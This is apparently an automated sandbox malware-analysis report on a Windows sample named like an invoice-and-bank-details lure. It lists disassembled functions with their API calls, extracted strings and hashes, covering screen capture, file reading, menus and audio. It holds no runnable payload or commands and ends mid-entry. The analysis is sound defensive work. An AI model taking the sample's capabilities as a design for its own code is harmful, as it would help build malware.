                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                APIs
                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                • GetMenuItemCount.USER32 ref: 00468CFD
                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                • GetCursorPos.USER32(?), ref: 00468D3F
                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                • String ID: 0
                                • API String ID: 1441871840-4108050209
                                • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                • __swprintf.LIBCMT ref: 00460915
                                • __swprintf.LIBCMT ref: 0046092D
                                • _wprintf.LIBCMT ref: 004609E1
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                • API String ID: 3631882475-2268648507
                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                APIs
                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                • SendMessageW.USER32 ref: 00471740
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                • SendMessageW.USER32 ref: 0047184F
                                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                • String ID:
                                • API String ID: 4116747274-0
                                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                APIs
                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                • _wcslen.LIBCMT ref: 00461683
                                • __swprintf.LIBCMT ref: 00461721
                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                • GetParent.USER32(?), ref: 004618C3
                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                • String ID: %s%u
                                • API String ID: 1899580136-679674701
                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                APIs
                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: InfoItemMenu$Sleep
                                • String ID: 0
                                • API String ID: 1196289194-4108050209
                                • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                APIs
                                • GetDC.USER32(00000000), ref: 0043143E
                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                • String ID: (
                                • API String ID: 3300687185-3887548279
                                • Opcode ID: 41c92e605eac5f81c665823633bc68f417f49a489604f1da0c85237d78d6e876
                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                • Opcode Fuzzy Hash: 41c92e605eac5f81c665823633bc68f417f49a489604f1da0c85237d78d6e876
                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                APIs
                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                • API String ID: 1976180769-4113822522
                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                • String ID:
                                • API String ID: 461458858-0
                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                • DeleteObject.GDI32(?), ref: 004301D0
                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                • String ID:
                                • API String ID: 3969911579-0
                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                • String ID: 0
                                • API String ID: 956284711-4108050209
                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                • String ID: 0.0.0.0
                                • API String ID: 1965227024-3771769585
                                • Opcode ID: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                • Opcode Fuzzy Hash: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                APIs
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: SendString$_memmove_wcslen
                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                • API String ID: 369157077-1007645807
                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                APIs
                                • GetParent.USER32 ref: 00445BF8
                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                • __wcsicoll.LIBCMT ref: 00445C33
                                • __wcsicoll.LIBCMT ref: 00445C4F
                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                • API String ID: 3125838495-3381328864
                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                APIs
                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
